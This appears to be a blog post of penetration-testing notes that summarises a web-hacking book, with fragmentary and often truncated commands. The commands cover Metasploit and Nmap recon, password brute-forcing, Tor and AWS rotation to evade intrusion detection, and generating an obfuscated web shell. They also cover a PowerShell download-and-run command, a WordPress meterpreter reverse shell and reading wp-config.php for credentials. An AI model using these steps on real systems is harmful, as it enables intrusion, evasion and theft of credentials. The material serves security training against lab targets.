Becoming Hacker | Hacking Notes |Pentesting Notes

Becoming Hacker | Hacking Notes |Pentesting Notes

• Penetration Testers Framework (PTF):
• BlackArch:
• Burp Suite:

Amazon Web Services:
• Microsoft Azure:
• Google Cloud Platform:
• DigitalOcean:
• Linode:

Complete the following exercises to get better acquainted with the hacker toolset
and the tools we’ll be using throughout this book:
1. Download and install your preferred penetration testing distribution:
Kali or BlackArch, or play around with PTF
2. Use Burp Suite Free or ZAP to intercept, inspect, and modify traffic
to your favorite site
3. Create a free account on the cloud computing provider of your choice
and use its free tier to launch a Linux virtual machine instance

1.NMAP Scan using MSF
2.MASSCAN — It’s faster than NMAP scanning
3.Whatweb — identity what technologies have been used to develop and run it.

4.Nikto — Nikto can guess subdomains,report on unusual headers, and check the robots.txt file for interesting information:

5. CMS scanners — When the target is using a CMS, such as Joomla, Drupal, or WordPress,running an automated vulnerability testing tool should be your next step

• WPScan ( A powerful tool aimed at testing WordPress installations
• JoomScan ( As the name implies, a CMS scanner specializing in Joomla testing
• droopescan ( A Drupal-specific scanner with some support for Joomla
• CMSmap ( A more generic scanner and brute-forcer supporting WordPress, Joomla, and Drupal

6.Efficient brute-forcingBrute-forcing a web service, for example, with the infamous rockyou.txt
One of the better collections of common keywords, credentials, directories payloads, and even webshells is the SecLists repository:

root@kali:~/tools# git clone
SecList Wordlist Description
Discovery — Web content, DNS, and common Nmap ports
Fuzzing — FuzzDB, Brutelogic, Polyglot payloads, and more
IOCs- Malware-related indicators of compromise
Miscellaneous — Various wordlists that may have obscure uses
Passwords — Large numbers of wordlists for common passwords,split into top-N files
Pattern-Matching — Wordlists for use when “grepping” for interesting information
Payloads — Webshells for common languages, Windows Netcat,and an EICAR test file
Usernames — Lists of common names and login IDs

Useful information can include the following:
• The webserver software: Apache, NGINX, or IIS
• Server-side development language: ASP.NET, PHP, or Java
• Underlying operating system: Linux, Windows, or embedded
• robots.txt
• Interesting response headers
• WAF detection: F5 or Akamai

The robots.txt file is generally interesting, as it can provide “hidden” directories
or files, and can be a good starting point when brute-forcing for directories or files.
The robots.txt file essentially provides instructions for legitimate crawler bots on
what they’re allowed to index and what they should ignore.

A sample robots.txt file will look something like this:
User-agent: *
Disallow: /cgi-bin/
Disallow: /test/
Disallow: /~admin/
7. Content discovery — tools — OWASP ZAP & Burp Suite 0r alternative automated — Gobuster

Burp Suite- Intruder module — easily perform content discovery -look for hidden directories and files, and even guess credentials
It supports payload processing and encoding, which enables us to customize our scanning to better interface with the target application.
Intruder module = same wordlists provided by SecLists

.Cluster bomb attack, which is well suited for multiple payloads,such as usernames and passwords, which we will showcase later
• Payload processing for highly customized attacks
• Attack throttling and variable delays for low and slow attacks

OWASP ZAP — Fuzzer module

root@kali:~# apt-get install golang
root@kali:~# export GOPATH=~/go
root@kali:~# export GOBIN=$GOPATH
root@kali:~/tools# git clone
root@kali:~/tools/gobuster# go get && go buildroot@kali:~/tools/gobuster# ./gobuster

Persistent content discovery ( — Application Hosted)

ZAP> Fuzz Location>select the raft-small-files.txt wordlist from the SecLists repository

Payload processing
Intruder will let us attack the basic authentication mechanism with little effort:
Payload:1 SecLists Usernames collection called top-usernames-shortlist.txt.
Payload:2 500-worst-passwords.txt

Payloads> Payload Processing>Add>Base64-encode

Start Attack

Polyglot payloads

OWASP cross-site scripting (XSS) —

Same payload, different context
A regex is a piece of text defining a search pattern. Some WAFs may use regex to try and find potentially dangerous strings inside HTTP requests.

Same payload, different context<! — Comment! [payload] →.

Code obfuscation

Consult the following resources for more information on penetration testing tools
and techniques:
• Metasploit:
• WPScan:
• CMSmap:
• Recon-NG (available in Kali Linux or via the Bitbucket repository):
• OWASP XSS Filter Evasion Cheat Sheet:
• Elsobky’s GitHub page:
• Brutelogic cheat sheet:
• SecLists repository:
• FuzzDB:

Chapter- 3 Low-Hanging Fruit

Network assessmentroot@kali:~# msfconsole
As with all engagements involving Metasploit, we start by creating a workspace specifically for the scope:
msf > workspace -a ecorp
For this scenario, our target is a black-box API application provided by E Corp.The target host will be api.ecorp.local.

Nmap is our network recon tool of choice and coupled with Metasploit’s workspace, it becomes even more powerful. The Metasploit console wrapper command for Nmap is the db_nmap command. The Nmap switches that we will use for discovering open ports, and querying services for more information, are detailed in the following text.

-sV will instruct Nmap to perform a version scan of any identified service
-A will provide us with some host fingerprinting, attempting to detect the operating system.
-T4 option is used to tell Nmap to be more aggressive when scanning the network
-Pn switch will prevent Nmap from performing a ping of the target
-p1- scan all possible ports -p1–65535

msf > db_nmap -sV -A -T4 -Pn -p1- api.ecorp.local

msf > services
MariaDB service which is the communitydeveloped fork for the MySQL software
a list of public Common Vulnerabilities and Exposures (CVEs)

msf > use auxiliary/scanner/mysql/mysql_version

We can view more information on the mysql_version module by issuing the show info command

msf auxiliary(mysql_version) > services -s mysql -R
RHOSTS => auxiliary(mysql_version) >
msf auxiliary(mysql_version) > run
msf auxiliary(mysql_version) > services -s mysql

Back in the Kali Linux terminal, we can use the mysql client command to attempt to authenticate as root (-u) to the api.ecorp.local host (-h):root@kali:~# mysql -uroot -hapi.ecorp.local

Credential guessing
msf > use auxiliary/scanner/mysql/mysql_login
msf auxiliary(mysql_login) > show options
msf auxiliary(mysql_login) > set THREADS 10msf auxiliary(mysql_login) > set VERBOSE falsemsf auxiliary(mysql_login) > set STOP_ON_SUCCESS truemsf auxiliary(mysql_login) >
set USERNAME root
USERNAME => root
msf auxiliary(mysql_login) > set PASS_FILE ~/tools/SecLists/Passwords/Common-Credentials/10-million-password-listtop-500.txt
PASS_FILE => ~/tools/SecLists/Passwords/Common-Credentials/10-millionpassword-list-top-10000.txt
msf auxiliary(mysql_login) >msf auxiliary(mysql_login) > run

A better way to shell
Weevely is a weaponized web shell installed on Kali Linux by default. It is very easy to use. It generates an obfuscated, password-protected PHP shell that can replace our earlier system() shell example. Weevely features some useful functionality that goes above and beyond the traditional system pass-through shell, including the following:
• A familiar terminal interface
• Network pivots
• File upload and download
• Reverse and direct TCP shell
• Meterpreter support

root@kali:/var/www/html# weevely generate

root@kali:/var/www/html# weevely generate ECorpAppTest11251 /var/www/html/shell.php

root@kali:/var/www/html# python -m SimpleHTTPServer 80

-m switch to load the SimpleHTTPServer module

root@kali:/var/www/html# curl -G
http://api.ecorp.local/xampp/xampp.php — data-urlencode
“password=ECorpAppTest11251& cmd=powershell -w hidden -noni -nop -c(new-object net.webclient).DownloadFile(

Consult the following resources for more information on penetration testing tools and techniques:
• Mitre provides a handy website with all the CVEs available:
• Weevely documentation and bleeding edge-code is available on GitHub:

Chapter-4 Advanced Brute-forcing

• Password spraying attacks
• Metadata harvesting and public site scraping
• Using Tor to evade intrusion detection systems (IDS)
• Using Amazon Web Services (AWS) to evade IDS

Password sprayingA common issue that comes up with brute-forcing for account credentials is that the backend authentication system may simply lockout the target account after too many invalid attempts are made in a short period of time. Microsoft’s Active
Directory (AD)

Outlook Web Access (OWA), Lightweight Directory Access Protocol (LDAP)

LinkedIn inurl:”/pub/” -inurl:”/dir/” “at [TargetCompany]”

save all account details in txt file

root@kali:~/tools# python > target_accounts.txt


The cluster bomb
Intruder module>Positions>Cluster bomb

Behind seven proxies
IDS, intrusion prevention systems (IPS), and security information and event management (SIEM)

Torify -

root@kali:~# apt-get install tor torsocks
Torsocks can be found on the Tor Project Git repository

root@kali:~# tor

ProxyChains is available on all penetration testing distros and on

Configuring the upstream SOCKS proxy in Burp
Burp Suite>Project options > Override user options
check to enable the SOCKS configuration fields. The values for SOCKS proxy and
port will be localhost and 9050 respectively, and it’s a good idea to make DNS
lookups through the proxy as well.

Repeater module, to

root@kali:~# torsocks — shell
/usr/bin/torsocks: New torified shell coming right up…

root@kali:~# curl

root@kali:~# killall -HUP tor
root@kali:~# curl
root@kali:~# killall -HUP tor
root@kali:~# curl ipinfo.ioroot@kali:~# killall -HUP
root@kali:~# curl ipinfo.ioroot@kali:~# killall -HUP torroot@kali:~# curl
root@kali:~# watch -n10 killall -HUP tor
-n option specifies how often to execute the killall command.

As expected, the application server log shows the attack coming
in every 10 seconds from a new exit node IP.

root@spider-c2–1:/var/www# php -S
A list of active Tor exit nodes can be found here:

Proxy cannon — alternative to using Tor

There are countless Infrastructure as a Service (IaaS) providers, each with a large IP
space available for free to VM instances. VMs are cheap and sometimes free as well,
so routing our traffic through them should be fairly cost effective.

By default, ProxyCannon creates t2.nano virtual instances in AWS, which should
be free for a limited time with new accounts. They have very little resources but are
typically enough for most attacks. To change the type of instance, we can supply the
-t switch. The default region is us-east-1 and can be adjusted using the — region

root@kali:~/tools# pip install -U botoroot@kali:~/tools# python -h

We can start ProxyCannon using the -r and -l switches, and specify that we want 3 instances running at the same time.root@kali:~/tools# python -r -l 3What is the AWS Access Key Id: d2hhdCBhcmUgeW91IGRvaW5nWhat is the AWS Secret Access Key: dW5mb3J0dW5hdGVseSB0aGlzIGlzIG5vdCB0aGUgcmVhbCBrZXku

root@kali:~/tools# cat ~/.boto

root@kali:~# watch -n30 curl

Chapter — 5 — File Inclusion Attacks
In this chapter, we will cover the following topics:
• RFI Remote File Inclusion
• LFI Local File Inclusion
• File upload abuse
• Chaining vulnerabilities to achieve code execution

DVWA can be downloaded in various formats, including an easy to run live CD, from keep things simple, our instance of DVWA will be accessible via



Chapter -6 — Out-of-Band Exploitation

In this chapter, we will look at the following:
• Creating a C2 server
• Using INetSim to emulate services
• Confirming vulnerabilities using out-of-band techniques
• Advanced data exfiltration

A common scenario

Chapter — 7 — Automated Testing

This chapter will expose you to valuable tools and by the end, you should be able to:
• Extend the attack proxy to automate tedious tasks
• Configure Burp to use the public Collaborator instance
• Deploy our own Collaborator instance

Extending Burp

BApp Store > Options
Jython is available on as a standalone JAR file.
JRuby is available on as a complete JAR file.

Additional Scanner Checks extension> Refresh > Install

Authentication and authorization abuse
One of the most tedious application security tests is an authentication or authorization
check. The basic steps to verify for this type of vulnerability go something like this:
1. Authenticate with a known-good account
2. Capture the session ID
3. Crawl the application with this session ID
4. Open a new application session
5. Authenticate with a separate known-good account
6. Capture the session ID
7. Replay the crawl with the new session ID:
° Check for vertical or horizontal escalation
8. Replay the crawl anonymously, without a session ID:
° Check for authentication bypass issues

BApp Store > Autorize

The Autorize flow
A new request is made through the attack proxy:
1. Replace the Cookie header with the other session ID
2. Replay the request:
° Does the response match the original request’s? Alert [Bypassed!]
3. Remove the Cookie header
4. Replay the request:
° Does the response match the original request’s? Alert [Bypassed!]

The Swiss Army knife
The CO2 plugin can be downloaded from the BApp Store or from GitHub at

sqlmap helper

root@kali:~/tools# git clone
root@kali:~/tools/sqlmap# ls -lah

sqlmap will save the session of each attack in a folder under the home directory: ~/.sqlmap/output/[target]

Web shells

Obfuscating code

root@kali:~/tools# git clone obfuscator phpobfs
root@kali:~/tools/# apt-get install composer
root@kali:~/tools/phpobfs# composer install
root@kali:~/tools/phpobfs# bin/obfuscate obfuscate ~/tools/shells/ads.php ~/tools/shells/out/
root@kali:~/tools/shells# ls -lah ads.php out/ads.php

Burp Collaborator

Burp Collaborator client

Private Collaborator server
Chapter-8 -Bad Serialization

Chapter -9 — Practical Client-Side Attacks

Cross-Site Request Forgery (CSRF) attacks
same-origin policy (SOP)

By the end of the chapter, you should be comfortable with:• Stored, reflected, and DOM-based XSS• CSRF and possible attacks and limitations• BeEF, the de facto tool for client-side exploitation in the browser

The SOP will permit the following types of cross-origin objects to be embedded into the origin from any other site:• Images• Stylesheets• Scripts (which the browser will gladly execute!)• Inline frames (iframe)

CDNJS is an open-source web CDN providing almost every conceivable JavaScript library. More information on this great service can be found at

Cross-origin resource sharing


Reflected XSS

Persistent XSS
DOM-based XSS
root@spider-c2:~# git clone
root@spider-c2:~/beef# ./install

Chapter — 10 Practical Server-Side Attacks
The goal of this chapter is to get you comfortable with XML attacks and, by the end, you will be familiar with:• DoS conditions• Server-Side Request Forgery (SSRF) attacks• Information leaks• Blind exploitation and out-of-band exfiltration of data• Remote code execution

Internal and external references
XXE attacks
Request forgery
Information leak —

CyberChef is a great tool for data manipulation, available online or for download from GCHQ at

Blind XXE
Remote code execution
Interactive shells

Chapter — 11 — Attacking APIs
Application programming interfaces (APIs)
Windows API (WinAPI),
By the end of the chapter, you will be comfortable with:• The different types of web API architecture• How APIs handle authentication• JSON Web Tokens (JWTs)• Automating API attacks

API communication protocols
• Representational State Transfer (REST)• Simple Object Access Protocol (SOAP)

SOAP was developed by Microsoft because Distributed Component Object Model(DCOM) is a binary protocol, which makes communication over the internet a bit more complicated. SOAP leverages XML instead, a more structured and human-readable language, to exchange messages between the client and the server

RESTful APIs operate over HTTP and they make heavy use of the protocol verbs, including but not limited to:• GET• POST• PUT• DELETE

API authentication
Basic authentication — man-in-the-middle (MITM) attacks
API keys
Bearer authentication
JWTs —

Burp JWT support

Installation — root@kali:~/tools# apt-get install libgconf-2–4
root@kali:~/tools# wget -O postman.tar.gz
root@kali:~/tools# tar zxvf postman.tar.gz
root@kali:~/tools# ~/tools/Postman/Postman

Upstream proxy

Chapter -12 Attacking CMS
In the coming pages, we will look at WordPress attacks in depth and by the end, you should be comfortable with the following:• Testing WordPress with various tools• Setting up persistence within the WordPress code once you get access• Backdooring WordPress to harvest credentials and other interesting data

Application assessment

root@kali:~# wpscan — url http://cookingwithfire.local/ — proxy

Using an upstream proxy with WPScan can generate a ton of data in Burp’s proxy history, especially when performing a credential attack or active scan.

The default user agent (WPScan vX.X.X) can be changed with the — user-agent switch or randomized with — random-agent.

WPScan is available on Kali and most penetration testing distributions. It can also be found on or cloned from GitHub:

root@kali:~# wpscan — url http://cookingwithfire.local/

To specify the type of scan we want to conduct, the — enumerate (-e for short) switch accepts several parameters for active detection:• u — Look for usernames with IDs from 1 to 10• u[10–20] — Look for usernames with IDs from 10 to 20: — enumerate u[15]• p — Look for popular plugins• vp — Show me only vulnerable plugins• ap — Look for all known plugins• tt — Search for timthumbs• t — Enumerate popular themes• vt — Show me only vulnerable themes• at — Look for all known themesYou can also provide multiple — enumerate (or -e) switches to enumerate themes, plugins, and usernames all in one shot. For example, this combination of switches will perform a fairly thorough scan

root@kali:~# wpscan — url [url] -e ap -e at -e u

searchsploit results for Google Document Embedder


root@kali:~/tools# git clone
root@kali:~/tools# cd droopescan/
root@kali:~/tools/droopescan# ls
root@kali:~/tools/droopescan# pip install -r requirements.txt
root@kali:~/tools/droopescan# python install
root@kali:~# droopescan scan drupal -u http://ramblings.local -t 8

Arachni web scanner
root@kali:~/tools/arachni/bin# ./arachni_web_create_user
root@kali:~/tools/arachni/bin# ./arachni_web

Arachni comes with three scanning profiles by default:• Default• Cross-Site Scripting (XSS)• SQL injection


root@kali:~# wpscan — url http://cookingwithfire.local/ — enumerate u

root@kali:~# wpscan — url http://cookingwithfire.local/ — usernames mary — passwords ~/tools/SecLists/Passwords/Leaked- Databases/rockyou-10.txt

For this attack, we will use SecLists’ rockyou-10.txt wordlist and we’ll target mary. As before, we can invoke wpscan with the — url parameter, then we will specify a username and point the passwords parameter to the rockyou-10.txt file from SecLists.

root@kali:~# msfconsole -q
msf > use exploit/unix/webapp/wp_admin_shell_upload
msf exploit(unix/webapp/wp_admin_shell_upload) > options
msf exploit(unix/webapp/wp_admin_shell_upload) > run
meterpreter > sysinfo
meterpreter > getuid
msf > use payload/php/meterpreter/reverse_tcp
msf payload(php/meterpreter/reverse_tcp) > options
msf payload(php/meterpreter/reverse_tcp) > generate -h
msf payload(php/meterpreter/reverse_tcp) > generate -t raw

msf > use exploit/multi/handler
msf exploit(multi/handler) > set PAYLOAD php/meterpreter/reverse_tcp
msf exploit(multi/handler) > options
msf exploit(multi/handler) > set ExitOnSession false

We can now run the handler with the -j option, which will send it to the background, ready for incoming connections from our victim:
msf exploit(multi/handler) > run -j

root@kali:~# curl http://cookingwithfire.local/wp- content/themes/twentyseventeen/404.php

Credential exfiltration
meterpreter > cat /var/www/html/wp-config.php

Did you find this article valuable?

Support Cyber Security by becoming a sponsor. Any amount is appreciated!